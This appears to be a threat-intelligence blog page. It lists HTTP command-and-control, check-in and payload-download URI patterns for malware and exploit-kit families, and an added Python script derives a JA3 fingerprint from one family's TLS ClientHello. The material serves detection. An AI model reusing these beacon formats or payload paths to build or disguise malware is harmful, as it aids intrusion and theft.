<a name='more'></a><br /></div>
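Not every row in the table is an HTTP URI: the Scieron / Httneilc / HTClient row is a raw packet dump, and the bytes (16 03 01 ... 01 ...) are a TLS 1.0 ClientHello. What distinguishes it is the cipher-suite list and the absence of any extensions, which is exactly what a JA3-style fingerprint captures. The following is an added example (not the page's tooling) that parses that dump, names the suites from the IANA registry and derives the JA3 string; the only input is the hex copied verbatim from the row below, and the parser's handling of the optional extensions block is written for the general case rather than exercised by this sample.

```python
"""Parse a raw TLS ClientHello and derive a JA3-style fingerprint.

Added example, not the page's tooling. The bytes are the hex dump from the
Scieron / Httneilc / HTClient row of the table, copied as-is; cipher suite
names are the IANA registry names. JA3 here follows the published recipe
(version,ciphers,extensions,curves,point formats; GREASE values dropped).
"""
import hashlib
import struct

SCIERON_DUMP = """\
0000 16 03 01 00 41 01 00 00 3d 03 01 54 c1 2a fa 82
0010 a5 0b 00 4c 7b 26 c9 33 81 bd 63 34 08 ab b3 38
0020 3a de 83 db b1 9c 95 02 3e c3 34 00 00 16 00 04
0030 00 05 00 0a 00 09 00 64 00 62 00 03 00 06 00 13
0040 00 12 00 63 01 00
"""

CIPHER_NAMES = {
    0x0003: "TLS_RSA_EXPORT_WITH_RC4_40_MD5",
    0x0004: "TLS_RSA_WITH_RC4_128_MD5",
    0x0005: "TLS_RSA_WITH_RC4_128_SHA",
    0x0006: "TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5",
    0x0009: "TLS_RSA_WITH_DES_CBC_SHA",
    0x000A: "TLS_RSA_WITH_3DES_EDE_CBC_SHA",
    0x0012: "TLS_DHE_DSS_WITH_DES_CBC_SHA",
    0x0013: "TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA",
    0x0062: "TLS_RSA_EXPORT1024_WITH_DES_CBC_SHA",
    0x0063: "TLS_DHE_DSS_EXPORT1024_WITH_DES_CBC_SHA",
    0x0064: "TLS_RSA_EXPORT1024_WITH_RC4_56_SHA",
}


class ParseError(ValueError):
    pass


def hexdump_to_bytes(dump: str) -> bytes:
    """Drop the leading offset column of each line and join the hex bytes."""
    return bytes.fromhex("".join("".join(l.split()[1:])
                                 for l in dump.splitlines() if l.strip()))


def _u16(b: bytes, off: int) -> int:
    if off + 2 > len(b):
        raise ParseError(f"truncated at offset {off}")
    return struct.unpack("!H", b[off:off + 2])[0]


def parse_client_hello(data: bytes) -> dict:
    """Dissect record -> handshake -> ClientHello fields with bounds checks."""
    if len(data) < 5 or data[0] != 0x16:
        raise ParseError("not a TLS handshake record")
    rec_len = _u16(data, 3)
    body = data[5:5 + rec_len]
    if len(body) != rec_len or body[0] != 0x01:
        raise ParseError("truncated record or not a ClientHello")
    hs_len = int.from_bytes(body[1:4], "big")
    h = body[4:4 + hs_len]
    if len(h) != hs_len or hs_len < 35:
        raise ParseError("truncated handshake")
    random = h[2:34]                        # 4-byte gmt_unix_time + 28 random
    pos = 34
    sid_len = h[pos]; pos += 1
    session_id = h[pos:pos + sid_len]; pos += sid_len
    cs_len = _u16(h, pos); pos += 2
    if cs_len % 2 or pos + cs_len > len(h):
        raise ParseError("bad cipher_suites length")
    suites = [_u16(h, pos + i) for i in range(0, cs_len, 2)]
    pos += cs_len
    comp_len = h[pos]; pos += 1
    comps = list(h[pos:pos + comp_len]); pos += comp_len
    exts, curves, formats = [], [], []
    if pos < len(h):                        # extensions block is optional
        end = pos + 2 + _u16(h, pos); pos += 2
        while pos + 4 <= end:
            etype, elen = _u16(h, pos), _u16(h, pos + 2); pos += 4
            ebody = h[pos:pos + elen]; pos += elen
            exts.append(etype)
            if etype == 10:                 # supported_groups (elliptic curves)
                curves = [_u16(ebody, i) for i in range(2, 2 + _u16(ebody, 0), 2)]
            elif etype == 11:               # ec_point_formats
                formats = list(ebody[1:1 + ebody[0]])
    return {
        "record_version": (data[1], data[2]),
        "client_version": (h[0], h[1]),
        "gmt_unix_time": struct.unpack("!I", random[:4])[0],
        "session_id": session_id,
        "cipher_suites": suites,
        "compression_methods": comps,
        "extensions": exts,
        "curves": curves,
        "point_formats": formats,
    }


def _is_grease(v: int) -> bool:
    return (v & 0x0F0F) == 0x0A0A and (v >> 8) == (v & 0xFF)


def ja3_string(hello: dict) -> str:
    ver = hello["client_version"][0] << 8 | hello["client_version"][1]
    fields = [hello["cipher_suites"], hello["extensions"], hello["curves"]]
    parts = ["-".join(str(v) for v in f if not _is_grease(v)) for f in fields]
    parts.append("-".join(str(v) for v in hello["point_formats"]))
    return ",".join([str(ver), *parts])


def ja3_hash(hello: dict) -> str:
    return hashlib.md5(ja3_string(hello).encode()).hexdigest()


def suite_names(hello: dict):
    return [CIPHER_NAMES.get(c, f"UNKNOWN_0x{c:04x}") for c in hello["cipher_suites"]]


SCIERON_HELLO = hexdump_to_bytes(SCIERON_DUMP)

if __name__ == "__main__":
    hello = parse_client_hello(SCIERON_HELLO)
    print("version", hello["client_version"], "extensions", hello["extensions"])
    print("ja3", ja3_string(hello), ja3_hash(hello))
    for name in suite_names(hello):
        print("  ", name)
```

The parse yields eleven suites in the order RC4-MD5, RC4-SHA, 3DES, DES, then five export-grade suites and two DHE-DSS ones, no session ID, no extensions (so no SNI), giving the JA3 string `769,4-5-10-9-100-98-3-6-19-18-99,,,`. That ordered list is what older Windows Schannel clients (XP era) send, so the fingerprint identifies the TLS stack the implant rides on rather than the implant itself; treat it as a pivot to combine with destination, timing and the lack of SNI, not as a standalone signature. The first four random bytes decode as a Unix timestamp (0x54c12afa, January 2015), which is consistent with the 2015 publication of the row.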
<div>
<table border="1" cellpadding="0" cellspacing="0" dir="ltr" style="border-collapse: collapse; border: 1px solid #ccc; font-family: arial,sans,sans-serif; font-size: 13px; table-layout: fixed;"><colgroup><col width="100"></col><col width="100"></col><col width="100"></col><col width="418"></col></colgroup><tbody>
<tr style="height: 21px;"><td style="font-weight: bold; padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">type</span></td><td style="font-weight: bold; padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">family</span></td><td style="font-weight: bold; padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">method</span></td><td style="font-weight: bold; padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">uri</span></td></tr>
<tr style="height: 21px;"><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Carberp / Glupteba</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/get_ads.php?yy=1&aid=2&atr=exts&src=199<br />/go/p1011105.subexts<br />/go/page/landing_page_68?nid=14&layout=qna&pid= p1011105.subexts&ip=auto&no_click=1&alpo_redirect=1<br />/javascript/live_cd/popunder_script-1400195675.js<br />/images/ffadult/css/header.css<br />/css/live_cd/ffadult/chinese/0/global_facelift-1414007370.css</span></td></tr>
<tr style="height: 21px;"><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Fiesta EK</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/?_SPMq=vahK1gfvq3&z1_Aj =fW8sL8ld&nkPgy= 81S8Y0_&0Us9=dr_fSq3Jai&w7Eaf= fu5dv5&wDK9=Ydqk1z4o6&52YRK=eHl9jdJ8j&I86 __=He0S4m9G<br />&QPy3i=J4HP58S7h&dRPS8=7bi7Y<br />/?3W_wN=I40_W5_&eht =t8vP8M8L&2ad_uO= 33KPa&_s3oi=8P5_7&QLfo= cHai8w&ZM7P_K=bSG7TH3p&UKb38= 1s4wx2s&jSJyB=cM7c<br />/?sk9=7ufJ8Ky7H8nS34n7f1h8t887R49&eDf= 1foPbZaw1VcxcHlfJdVw83P69hP1uSdYbR<br />/?_I4XS=idKbueq4kR1q8&0TsZ= Y0Wn7Lbr6K9hch&thXvW=56WPaqG2OdJ0&Ff_lty= x21dbrs8y5<br />/?m_FxE=eh0&MkFq=H8GeS&fz7= 1l3&d2T6r=ae&LeH_9= k0Il2W&Z7i6=3S1&7h_ =Sdlc&zmGAU=i0uf&mMwf=ehp5p& ymV7T=y7lKe&Jpk_DF=_5_2</span></td></tr>
<tr style="height: 21px;"><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Fiesta EK</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/yzzzpiehxpvij8ps46znskyaqfa5ijkduakhxwcbj9<br />/ai_qkvu2/4a374fcc5b4966050058040c015d5253005 2030f0f5201530f54070e0507525450;118800;94<br />/ai_qkvu2/074f70a95a1651de5952585d020b5009040 4045e0c0403090b02005f0651500e54</span></td></tr>
<tr style="height: 21px;"><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Gongdad / Gong Da compromised site redirects</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/pg/kcp/index.html<br />/popup/index.html<br />/my/by4.html</span></td></tr>
<tr style="height: 21px;"><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Gongdad / Gong Da EK</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/data/file/cr/index.html<br />/data/file/cr/swfobject.js<br />/data/file/cr/jquery-1.4.2.min.js<br />/data/file/cr/main.html<br />/data/file/cr/AyVpSf.jar<br />/data/file/cr/com.class<br />/data/file/cr/edu.class<br />/data/file/cr/net.class<br />/data/file/cr/org.class /windos.exe</span></td></tr>
<tr style="height: 21px;"><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Dalexis Loader</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/tmp/pack.tar.gz<br />/assets/pack.tar.gz<br />/piwigotest/pack.tar.gz<br />/histoiredesarts/pack.tar.gz<br />/fit/pack.tar.gz</span></td></tr>
<tr style="height: 21px;"><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Gholee / Rocket Kitten</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET / POST</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/index.php?c=Ud7atknq&r=17117d<br />/index.php?c=Ud7atknq&r=1710b2</span></td></tr>
<tr style="height: 21px;"><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Zemot</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/b/shoe</span></td></tr>
<tr style="height: 21px;"><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Zemot DL via Asprox</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/catalog/159</span></td></tr>
<tr style="height: 21px;"><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Zemot downloading Rovnix</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/mod_jshopping_products_gdle/mod_smartslider2/</span></td></tr>
<tr style="height: 21px;"><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Zemot downloading Rerdom</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/mod_jshoppi/soft32.dl</span></td></tr>
<tr style="height: 21px;"><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Rerdom</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/b/eve/&lt;redacted&gt;</span></td></tr>
<tr style="height: 21px;"><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Clickfraud</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/b/req/&lt;redacted&gt;</span></td></tr>
<tr style="height: 21px;"><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Cidox / Rerdom / Clickfraud</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/b/eve/e91425775cc5d7e657bd2cc7<br />/b/letr/21D84379F768D95442B92BC5<br />/b/opt/E1805AD5D79824076249D696<br />/b/req/FDD953BA382388758DF27AE4<br />/b/pkg/&lt;redacted&gt;</span></td></tr>
<tr style="height: 21px;"><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Cidox / Rerdom / Clickfraud - clickurl GET</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/x/48petqwk9/&lt;redacted&gt;/AA/0</span></td></tr>
<tr style="height: 21px;"><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Cidox / Rerdom / Clickfraud - clickurl GET</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/2014/06/26/new-game-tech-behind-scenes-sony -playstation with referrer http://controller-best.com</span></td></tr>
<tr style="height: 21px;"><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT / CRIME</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Scieron / Httneilc / HTClient</span></td><td style="padding: 2px 3px; vertical-align: top;"></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">packet data 0000 16 03 01 00 41 01 00 00 3d 03 01 54 c1 2a fa 82<br />0010 a5 0b 00 4c 7b 26 c9 33 81 bd 63 34 08 ab b3 38<br />0020 3a de 83 db b1 9c 95 02 3e c3 34 00 00 16 00 04<br />0030 00 05 00 0a 00 09 00 64 00 62 00 03 00 06 00 13<br />0040 00 12 00 63 01 00</span></td></tr>
<tr style="height: 21px;"><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Zollard RFI</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/cgi-bin/php? %2D%64+%...&lt;long string removed, php encoded&gt;...%2D%6E</span></td></tr>
<tr style="height: 21px;"><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Upatre</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/js/jquery-1.41.15.js<br />/js/jquery-1.41.15.js?aCNDrnl3=[user-agent string]&hjmcSOLrVb5fK5a =1846&kZuJV1OyPrXdK0= 1267859342&OjyOcmABhJHuu=gDyC5hx734Wu1.js<br />/js/jquery-1.41.15.js?get_message=3290013886</span></td></tr>
<tr style="height: 21px;"><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Cryptowall 3.0</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">http://proxy1-1-1.i2p/fee4roy2hih9<br />http://payto4gtpn5czl2.torforall.com/ofs20c</span></td></tr>
<tr style="height: 21px;"><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Andromeda</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/ldr.php</span></td></tr>
<tr style="height: 21px;"><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Angler EK Chain</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/t19jl0hvv2.php</span></td></tr>
<tr style="height: 21px;"><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Angler EK Chain</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/752s2n0ndw.php</span></td></tr>
<tr style="height: 21px;"><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Angler EK Chain</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/erL0pIvz9_wyAlk2koy7L4b2qScYutODp2Cm dYZyW hw1bW9lGM8EDW8cKKjx47cp</span></td></tr>
<tr style="height: 21px;"><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Angler EK Chain</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/P-SqI9OgILhp9clsf2ne5wgWHy4i2ew2hy 48WScNKA 9m2DKeiJNTp7gSxYSPcXsN</span></td></tr>
<tr style="height: 21px;"><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Angler EK Chain</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/models/runway/ring/header.js</span></td></tr>
<tr style="height: 21px;"><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Angler EK Chain</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/code/decrease/revenue/core.js</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Asprox / Kuluoz"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Asprox / Kuluoz</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/include.php?t=20lB5S+e4qW48vWs/RXbneRWTR9t JTB67xoumOnEvak=\nHTTPS over port 443 as a possible connectivity check"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/include.php?t=20lB5S+e4qW48vWs/RXbneRWTR9t JTB67xoumOnEvak=<br />HTTPS over port 443 as a possible connectivity check</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Asprox / Kuluoz"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Asprox / Kuluoz</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/index.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/index.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Chanitor"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Chanitor</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/gate.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/gate.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Chanitor Downloads"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Chanitor Downloads</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/wp-includes/js/tinymce/plugins/wpfullscreen/1.php\n/wp-includes/js/tinymce/skins/lightgray/1.php\n/wp-content/plugins/motopress-content-editor /flexslider/fonts/1.php\n/wp-includes/js/tinymce/plugins/wpfullscreen/1.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/wp-includes/js/tinymce/plugins/wpfullscreen/1.php<br />/wp-includes/js/tinymce/skins/lightgray/1.php<br />/wp-content/plugins/motopress-content-editor /flexslider/fonts/1.php<br />/wp-includes/js/tinymce/plugins/wpfullscreen/1.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Cryptowall"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Cryptowall</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/532boskc3i0\n/nvebi4m4ggdokz\n/wbkljtzpimbryt"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/532boskc3i0<br />/nvebi4m4ggdokz<br />/wbkljtzpimbryt</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Cryptowall"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Cryptowall</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/wp-content/themes/exiportal/dh5x3a1815j \n/wp-content/themes/esther/6l7de"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/wp-content/themes/exiportal/dh5x3a1815j <br />/wp-content/themes/esther/6l7de</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Dridex payload"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Dridex payload</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/mopsi/popsi.php\n/js/bin.exe"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/mopsi/popsi.php<br />/js/bin.exe</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Fake AV post compromise"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Fake AV post compromise</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/?0=13&1=1&2=15&3=i&4=7600&5=0&6=1111&7 =kyxnujmwnn"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/?0=13&1=1&2=15&3=i&4=7600&5=0&6=1111&7 =kyxnujmwnn</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Fiesta EK"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Fiesta EK</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/txf9p_v8/ye1PlchZ7X9pFcl0o-y3\n/txf9p_v8/14dcb5b6b53272fd050d5358500e540100 0750585657520d0400060703005305 ;114402;287\n/txf9p_v8/4dc239e53174afbc5d010f0901025302055 75709075b550e01500156520c5406"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/txf9p_v8/ye1PlchZ7X9pFcl0o-y3<br />/txf9p_v8/14dcb5b6b53272fd050d5358500e540100 0750585657520d0400060703005305 ;114402;287<br />/txf9p_v8/4dc239e53174afbc5d010f0901025302055 75709075b550e01500156520c5406</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Flashpack EK"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Flashpack EK</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/sv62a76d18537/index.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/sv62a76d18537/index.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"GameThief"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GameThief</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/tj.asp"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/tj.asp</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"GameThief"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GameThief</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/count.asp?mac=8-0-27-8F-E3-EB&ComPut=Windows%20XP& iellq=IE:6.0.2900.5512&mrllq=iexplore&userid=jack"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/count.asp?mac=8-0-27-8F-E3-EB&ComPut=Windows%20XP& iellq=IE:6.0.2900.5512&mrllq=iexplore&userid=jack</span></td></tr>
